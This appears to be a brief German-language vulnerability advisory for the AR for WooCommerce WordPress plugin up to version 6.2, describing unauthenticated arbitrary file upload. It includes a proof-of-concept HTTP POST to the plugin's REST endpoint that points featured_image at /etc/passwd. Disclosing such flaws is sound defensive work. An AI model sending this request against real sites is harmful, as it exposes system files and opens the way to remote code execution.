
AR For Woocommerce <= 6.2 - Nicht authentifizierter beliebiger Datei-Upload
AR For Woocommerce <= 6.2 – Nicht authentifizierter beliebiger Datei-Upload
Das AR for WooCommerce-Plugin für WordPress ist in allen Versionen bis einschließlich 6.2 aufgrund fehlender Dateityp-Validierung anfällig für beliebige Datei-Uploads. Dadurch können nicht authentifizierte Angreifer beliebige Dateien auf dem betroffenen Server hochladen, was eine Remotecodeausführung ermöglichen kann.
POST /wp-json/ar-wc-display/featuredimage/ HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 41
{"id":123,"featured_image":"/etc/passwd"}